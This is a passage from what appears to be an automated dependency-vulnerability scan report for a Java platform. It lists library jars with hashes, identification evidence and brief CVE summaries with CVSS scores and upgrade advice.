Base Score: HIGH (7.1) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:C
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2017-10355 (OSSINDEX)
sonatype-2017-0348 - xerces:xercesImpl - Denial of Service (DoS)
The software contains multiple threads or executable segments that are waiting for each other to release a necessary lock, resulting in deadlock. CWE-833 Deadlock
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:xerces:xercesImpl:2.12.0:*:*:*:*:*:*:*
xhtmlrenderer-3.0.0.jar
Description:
Modified flyingsaucer XML/XHTML and CSS 2.1 renderer, to support docx (and eventually pptx) output
License:
Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/docx4j/xhtmlrenderer/3.0.0/xhtmlrenderer-3.0.0.jar
MD5: d1f1faf911c376261b7698282bbf0c08
SHA1: 14c766017bd26c1b1f96f170833845bc1bab6aeb
SHA256: 7189d588e7888c92da996eded1b5a17ac435eb6193b47e2207805fc458e318c9
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xhtmlrenderer High Vendor jar package name css Highest Vendor jar package name docx Highest Vendor jar package name docx4j Highest Vendor jar package name docx4j Low Vendor jar package name org Highest Vendor jar package name org Low Vendor jar package name xhtmlrenderer Highest Vendor jar package name xhtmlrenderer Low Vendor pom artifactid xhtmlrenderer Highest Vendor pom artifactid xhtmlrenderer Low Vendor pom developer email jason@plutext.org Low Vendor pom developer id jharrop Medium Vendor pom developer name Jason Harrop Medium Vendor pom developer org Plutext Medium Vendor pom groupid org.docx4j Highest Vendor pom name xhtmlrenderer High Vendor pom url http://www.docx4java.org/ Highest Product file name xhtmlrenderer High Product jar package name css Highest Product jar package name docx Highest Product jar package name docx4j Highest Product jar package name org Highest Product jar package name org Low Product jar package name xhtmlrenderer Highest Product jar package name xhtmlrenderer Low Product pom artifactid xhtmlrenderer Highest Product pom developer email jason@plutext.org Low Product pom developer id jharrop Low Product pom developer name Jason Harrop Low Product pom developer org Plutext Low Product pom groupid org.docx4j Highest Product pom name xhtmlrenderer High Product pom url http://www.docx4java.org/ Medium Version file version 3.0.0 High Version pom version 3.0.0 Highest
xmlbeans-3.1.0.jar
Description:
XmlBeans main jar
License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/xmlbeans/xmlbeans/3.1.0/xmlbeans-3.1.0.jar
MD5: 408902d943e5bd51a4813dae131681a3
SHA1: 6dac1f897dfb3e3f17fc79b18a3353b2e51c464e
SHA256: a19ea1ec835a101165f7aa3c55427e81b5f2b187bfe7689a19277c51402620b0
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xmlbeans High Vendor jar package name apache Highest Vendor jar package name xmlbeans Highest Vendor manifest: org/apache/xmlbeans/ Implementation-Vendor Apache Software Foundation Medium Vendor pom artifactid xmlbeans Highest Vendor pom artifactid xmlbeans Low Vendor pom developer email cezar.andrei@no#spam#!gma|l.com Low Vendor pom developer email jacob.danner@nos#pam.oracle.com Low Vendor pom developer email radu.preotiuc-pietro@nos#pam.bea.com Low Vendor pom developer email radupr@nos#pam.gm@il.com Low Vendor pom developer email user@poi.apache.org Low Vendor pom developer email wing-yew.poon@nos#pam.oracle.com Low Vendor pom developer id cezar Medium Vendor pom developer id jdanner Medium Vendor pom developer id poi Medium Vendor pom developer id radup Medium Vendor pom developer id wpoon Medium Vendor pom developer name Cezar Andrei Medium Vendor pom developer name Jacob Danner Medium Vendor pom developer name POI Team Medium Vendor pom developer name Radu Preotiuc Medium Vendor pom developer name Wing Yew Poon Medium Vendor pom developer org Apache POI Medium Vendor pom groupid org.apache.xmlbeans Highest Vendor pom name XmlBeans High Vendor pom organization name XmlBeans High Vendor pom organization url https://xmlbeans.apache.org/ Medium Vendor pom url https://xmlbeans.apache.org/ Highest Product file name xmlbeans High Product jar package name apache Highest Product jar package name xmlbeans Highest Product manifest: org/apache/xmlbeans/ Implementation-Title org.apache.xmlbeans Medium Product pom artifactid xmlbeans Highest Product pom developer email cezar.andrei@no#spam#!gma|l.com Low Product pom developer email jacob.danner@nos#pam.oracle.com Low Product pom developer email radu.preotiuc-pietro@nos#pam.bea.com Low Product pom developer email radupr@nos#pam.gm@il.com Low Product pom developer email user@poi.apache.org Low Product pom developer email wing-yew.poon@nos#pam.oracle.com Low Product 
pom developer id cezar Low Product pom developer id jdanner Low Product pom developer id poi Low Product pom developer id radup Low Product pom developer id wpoon Low Product pom developer name Cezar Andrei Low Product pom developer name Jacob Danner Low Product pom developer name POI Team Low Product pom developer name Radu Preotiuc Low Product pom developer name Wing Yew Poon Low Product pom developer org Apache POI Low Product pom groupid org.apache.xmlbeans Highest Product pom name XmlBeans High Product pom organization name XmlBeans Low Product pom organization url https://xmlbeans.apache.org/ Low Product pom url https://xmlbeans.apache.org/ Medium Version file version 3.1.0 High Version manifest: org/apache/xmlbeans/ Implementation-Version 3.1.0 Medium Version pom version 3.1.0 Highest
xmlgraphics-commons-2.3.jar
Description:
Apache XML Graphics Commons is a library that consists of several reusable components used by Apache Batik and Apache FOP. Many of these components can easily be used separately outside the domains of SVG and XSL-FO.
License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/xmlgraphics/xmlgraphics-commons/2.3/xmlgraphics-commons-2.3.jar
MD5: 3edc187a769f9ff50e53f095bccb20cd
SHA1: f0b77d80c4d8f02538512b4d505af0cf5286eb7f
SHA256: 1fb91bac2795f7a768a7665f40cde996023a489ecc43e5ee67ad40fbaa79e194
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xmlgraphics-commons High Vendor jar package name apache Highest Vendor jar package name xmlgraphics Highest Vendor Manifest Implementation-Vendor The Apache Software Foundation (http://xmlgraphics.apache.org/) High Vendor pom artifactid xmlgraphics-commons Highest Vendor pom artifactid xmlgraphics-commons Low Vendor pom groupid org.apache.xmlgraphics Highest Vendor pom name Apache XML Graphics Commons High Vendor pom organization name Apache Software Foundation High Vendor pom organization url http://www.apache.org/ Medium Vendor pom parent-artifactid apache Low Vendor pom parent-groupid org.apache Medium Vendor pom url http://xmlgraphics.apache.org/commons/ Highest Product file name xmlgraphics-commons High Product jar package name apache Highest Product jar package name xmlgraphics Highest Product Manifest Implementation-Title Apache XML Graphics Commons High Product pom artifactid xmlgraphics-commons Highest Product pom groupid org.apache.xmlgraphics Highest Product pom name Apache XML Graphics Commons High Product pom organization name Apache Software Foundation Low Product pom organization url http://www.apache.org/ Low Product pom parent-artifactid apache Medium Product pom parent-groupid org.apache Medium Product pom url http://xmlgraphics.apache.org/commons/ Medium Version file version 2.3 High Version Manifest Implementation-Version 2.3 High Version pom parent-version 2.3 Low Version pom version 2.3 Highest
CVE-2020-11988
Apache XmlGraphics Commons 2.4 and earlier is vulnerable to server-side request forgery, caused by improper input validation by the XMPParser. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests. Users should upgrade to 2.6 or later. CWE-20 Improper Input Validation, CWE-918 Server-Side Request Forgery (SSRF)
CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N
CVSSv3:
Base Score: HIGH (8.2) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
References:
Vulnerable Software & Versions:
xmlsec-2.1.4.jar
Description:
Apache XML Security for Java supports XML-Signature Syntax and Processing, W3C Recommendation 12 February 2002, and XML Encryption Syntax and Processing, W3C Recommendation 10 December 2002. As of version 1.4, the library supports the standard Java API JSR-105: XML Digital Signature APIs.
License:
Apache License, Version 2.0: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/santuario/xmlsec/2.1.4/xmlsec-2.1.4.jar
MD5: bedb9da77422052baeab84af891392a6
SHA1: cb43326f02e3e77526c24269c8b5d3cc3f7f6653
SHA256: 2e2ec8fe0cf873979f630ae4d35e7ede3390321279b7a15de9deed3f3430990c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xmlsec High Vendor jar package name apache Highest Vendor jar package name encryption Highest Vendor jar package name security Highest Vendor jar package name signature Highest Vendor jar package name xml Highest Vendor Manifest automatic-module-name org.apache.santuario.xmlsec Medium Vendor Manifest bundle-docurl https://www.apache.org/ Low Vendor Manifest bundle-symbolicname org.apache.santuario.xmlsec Medium Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.santuario Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid xmlsec Highest Vendor pom artifactid xmlsec Low Vendor pom groupid org.apache.santuario Highest Vendor pom name Apache XML Security for Java High Vendor pom organization name The Apache Software Foundation High Vendor pom organization url https://www.apache.org/ Medium Vendor pom parent-artifactid apache Low Vendor pom parent-groupid org.apache Medium Vendor pom url https://santuario.apache.org/ Highest Product file name xmlsec High Product jar package name apache Highest Product jar package name encryption Highest Product jar package name security Highest Product jar package name signature Highest Product jar package name xml Highest Product Manifest automatic-module-name org.apache.santuario.xmlsec Medium Product Manifest bundle-docurl https://www.apache.org/ Low Product Manifest Bundle-Name Apache XML Security for Java Medium Product Manifest bundle-symbolicname org.apache.santuario.xmlsec Medium Product Manifest Implementation-Title Apache XML Security for Java High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title Apache XML Security for Java Medium Product pom artifactid xmlsec Highest Product 
pom groupid org.apache.santuario Highest Product pom name Apache XML Security for Java High Product pom organization name The Apache Software Foundation Low Product pom organization url https://www.apache.org/ Low Product pom parent-artifactid apache Medium Product pom parent-groupid org.apache Medium Product pom url https://santuario.apache.org/ Medium Version file version 2.1.4 High Version Manifest Bundle-Version 2.1.4 High Version Manifest Implementation-Version 2.1.4 High Version pom parent-version 2.1.4 Low Version pom version 2.1.4 Highest
pkg:maven/org.apache.santuario/xmlsec@2.1.4 (Confidence: High)
cpe:2.3:a:apache:santuario_xml_security_for_java:2.1.4:*:*:*:*:*:*:* (Confidence: Low)
cpe:2.3:a:apache:xml_security_for_java:2.1.4:*:*:*:*:*:*:* (Confidence: Low)
CVE-2021-40690
All versions of Apache Santuario - XML Security for Java prior to 2.2.3 and 2.1.7 are vulnerable to an issue where the "secureValidation" property is not passed correctly when creating a KeyInfo from a KeyInfoReference element. This allows an attacker to abuse an XPath Transform to extract any local .xml files in a RetrievalMethod element. CWE-200 Information Exposure
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2023-44483
All versions of Apache Santuario - XML Security for Java prior to 2.2.6, 2.3.4, and 3.0.3, when using the JSR 105 API, are vulnerable to an issue where a private key may be disclosed in log files when generating an XML Signature and logging with debug level is enabled. Users are recommended to upgrade to version 2.2.6, 2.3.4, or 3.0.3, which fixes this issue.
CWE-532 Information Exposure Through Log Files
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
xmpcore-5.1.3.jar
Description:
The XMP Library for Java is based on the C++ XMPCore library and the API is similar.
License:
The BSD License: http://www.adobe.com/devnet/xmp/library/eula-xmp-library-java.html
File Path: /var/simplicite/.m2/repository/com/adobe/xmp/xmpcore/5.1.3/xmpcore-5.1.3.jar
MD5: 08d154cf297e87471637df85172f93e6
SHA1: 57e70c3b10ff269fff9adfa7a31d61af0df30757
SHA256: 821be907f1e514ebb50f0ca04b2c098370a3cb5e5f9ddcc2ecf81e73eb265daa
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xmpcore High Vendor jar package name adobe Highest Vendor jar package name xmp Highest Vendor Manifest adobeip Low Vendor Manifest builddate 2016 Sep 02 16:31:16-CEST Low Vendor Manifest implementation-debug false Low Vendor Manifest implementation-engbuild 003 Low Vendor Manifest implementation-major 5 Low Vendor Manifest implementation-micro 3 Low Vendor Manifest implementation-minor 1 Low Vendor Manifest Implementation-Vendor Copyright 2006-2009 Adobe Systems Incorporated. All rights reserved High Vendor pom artifactid xmpcore Highest Vendor pom artifactid xmpcore Low Vendor pom developer org Adobe Systems, Inc. Medium Vendor pom developer org URL http://www.adobe.com/ Medium Vendor pom groupid com.adobe.xmp Highest Vendor pom name XMP Library for Java High Vendor pom url http://www.adobe.com/devnet/xmp.html Highest Product file name xmpcore High Product jar package name adobe Highest Product jar package name xmp Highest Product Manifest adobeip Low Product Manifest builddate 2016 Sep 02 16:31:16-CEST Low Product Manifest implementation-debug false Low Product Manifest implementation-engbuild 003 Low Product Manifest implementation-major 5 Low Product Manifest implementation-micro 3 Low Product Manifest implementation-minor 1 Low Product Manifest Implementation-Title Adobe XMP Core High Product pom artifactid xmpcore Highest Product pom developer org Adobe Systems, Inc. Low Product pom developer org URL http://www.adobe.com/ Low Product pom groupid com.adobe.xmp Highest Product pom name XMP Library for Java High Product pom url http://www.adobe.com/devnet/xmp.html Medium Version file version 5.1.3 High Version pom version 5.1.3 Highest
xsom-2.3.2.jar
Description:
XML Schema Object Model (XSOM) is a Java library that allows applications to easily parse XML Schema documents and inspect information in them. It is expected to be useful for applications that need to take XML Schema as an input.
File Path: /var/simplicite/.m2/repository/org/glassfish/jaxb/xsom/2.3.2/xsom-2.3.2.jar
MD5: 69490072151ce34b84c8d0990a931c6d
SHA1: 0157dc2bf479c524d63a214e8fe9888f45a667db
SHA256: 598196320e56138f78895c9bbc3055983d25b76814f072dfcb836f8cc4437c73
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xsom High Vendor jar package name sun Low Vendor jar package name xml Highest Vendor jar package name xml Low Vendor jar package name xsom Highest Vendor jar package name xsom Low Vendor jar (hint) package name oracle Low Vendor pom artifactid xsom Highest Vendor pom artifactid xsom Low Vendor pom groupid org.glassfish.jaxb Highest Vendor pom name XSOM High Vendor pom parent-artifactid project Low Vendor pom parent-groupid org.eclipse.ee4j Medium Product file name xsom High Product jar package name impl Low Product jar package name xml Highest Product jar package name xml Low Product jar package name xsom Highest Product jar package name xsom Low Product pom artifactid xsom Highest Product pom groupid org.glassfish.jaxb Highest Product pom name XSOM High Product pom parent-artifactid project Medium Product pom parent-groupid org.eclipse.ee4j Medium Version file version 2.3.2 High Version pom parent-version 2.3.2 Low Version pom version 2.3.2 Highest
xz-1.8.jar
Description:
XZ data compression
License:
Public Domain
File Path: /var/simplicite/.m2/repository/org/tukaani/xz/1.8/xz-1.8.jar
MD5: 5f982127e0de85b785c4b2abad21aa2e
SHA1: c4f7d054303948eb6a4066194253886c8af07128
SHA256: 8c7964b36fe3f0cbe644b04fcbff84e491ce81917db2f5bfa0cba8e9548aff5d
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xz High Vendor jar package name tukaani Highest Vendor jar package name xz Highest Vendor Manifest automatic-module-name org.tukaani.xz Medium Vendor Manifest bundle-docurl https://tukaani.org/xz/java.html Low Vendor Manifest bundle-symbolicname org.tukaani.xz Medium Vendor Manifest implementation-url https://tukaani.org/xz/java.html Low Vendor pom artifactid xz Highest Vendor pom artifactid xz Low Vendor pom developer email lasse.collin@tukaani.org Low Vendor pom developer name Lasse Collin Medium Vendor pom groupid org.tukaani Highest Vendor pom name XZ for Java High Vendor pom url https://tukaani.org/xz/java.html Highest Product file name xz High Product jar package name tukaani Highest Product jar package name xz Highest Product Manifest automatic-module-name org.tukaani.xz Medium Product Manifest bundle-docurl https://tukaani.org/xz/java.html Low Product Manifest Bundle-Name XZ data compression Medium Product Manifest bundle-symbolicname org.tukaani.xz Medium Product Manifest Implementation-Title XZ data compression High Product Manifest implementation-url https://tukaani.org/xz/java.html Low Product pom artifactid xz Highest Product pom developer email lasse.collin@tukaani.org Low Product pom developer name Lasse Collin Low Product pom groupid org.tukaani Highest Product pom name XZ for Java High Product pom url https://tukaani.org/xz/java.html Medium Version file version 1.8 High Version Manifest Bundle-Version 1.8 High Version Manifest Implementation-Version 1.8 High Version pom version 1.8 Highest